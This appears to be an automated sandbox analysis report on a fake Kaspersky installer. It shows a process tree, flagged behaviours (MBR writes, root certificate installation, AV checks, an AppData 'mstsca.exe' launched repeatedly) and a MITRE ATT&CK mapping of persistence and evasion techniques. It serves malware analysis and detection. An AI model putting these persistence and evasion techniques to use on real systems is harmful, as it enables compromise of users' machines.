C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=968 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6308 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7044 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5852 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,1722868614719386866,8954395748721981685,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:82⤵
-
C:\Users\Admin\Downloads\kav21.3.10.391en_26075.exe"C:\Users\Admin\Downloads\kav21.3.10.391en_26075.exe"2⤵
- Loads dropped DLL
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Drops file in Windows directory
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\43F97DAE-32D9-11ED-89AC-E62D9FD3CB0B\TEST_WPF.EXE"C:\Users\Admin\AppData\Local\Temp\43F97DAE-32D9-11ED-89AC-E62D9FD3CB0B\TEST_WPF.EXE" "C:\Users\Admin\AppData\Local\Temp\CAD79F349D23DE1198CA6ED2F93DBCB0\setup.dll"3⤵
- Loads dropped DLL
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={53e66dc9-c21d-44be-9210-d55306dabd41} --system2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Enumerates VirtualBox registry keys
- Checks SCSI registry key(s)
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Checks for any installed AV software in registry
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F69EBF3B38EE29A85030884C6C4D1142⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F7AE221EA457731767459D88AEA7494 E Global\MSI00002⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding B664845B6EB90852ABF195479A8BFBAB E Global\MSI00002⤵
- Drops file in Drivers directory
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\ddefwhhC:\Users\Admin\AppData\Roaming\ddefwhh1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 46916 -s 3122⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 46916 -ip 469161⤵
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exeC:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab\OtV01fNRpBSqIMPnvBIz_5U1.exe --Task2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Bootkit (1)
- Scheduled Task (1)
Defense Evasion
- Virtualization/Sandbox Evasion (2)
- File Permissions Modification (1)
- Modify Registry (3)
- Install Root Certificate (1)
Downloads
-
memory/11168-1060-0x0000000000000000-mapping.dmp
-
memory/11256-1066-0x0000000000000000-mapping.dmp
-
memory/12632-233-0x0000000000000000-mapping.dmp
-
memory/12868-232-0x0000000000000000-mapping.dmp
-
memory/40852-250-0x0000000000070000-0x00000000000A7000-memory.dmpFilesize
220KB
-
memory/40852-249-0x0000000000000000-mapping.dmp
-
memory/44000-248-0x0000000000000000-mapping.dmp
-
memory/47800-292-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-294-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-269-0x0000000000000000-mapping.dmp
-
memory/47800-270-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/47800-287-0x0000000001000000-0x0000000001054000-memory.dmpFilesize
336KB
-
memory/50772-262-0x0000000000000000-mapping.dmp
-
memory/50772-263-0x00000000013A0000-0x00000000013BC000-memory.dmpFilesize
112KB
-
memory/50772-316-0x0000000006810000-0x000000000682E000-memory.dmpFilesize
120KB
-
memory/50840-264-0x0000000000000000-mapping.dmp
-
memory/50840-267-0x00000000007E0000-0x0000000000841000-memory.dmpFilesize
388KB
-
memory/50916-251-0x0000000000000000-mapping.dmp
-
memory/50916-252-0x0000000000400000-0x0000000000460000-memory.dmpFilesize
384KB
-
memory/50956-253-0x0000000000000000-mapping.dmp
-
memory/50956-255-0x00000000007D0000-0x00000000007F8000-memory.dmpFilesize
160KB
-
memory/51104-261-0x00000000007C0000-0x00000000007E9000-memory.dmpFilesize
164KB
-
memory/51104-258-0x0000000000000000-mapping.dmp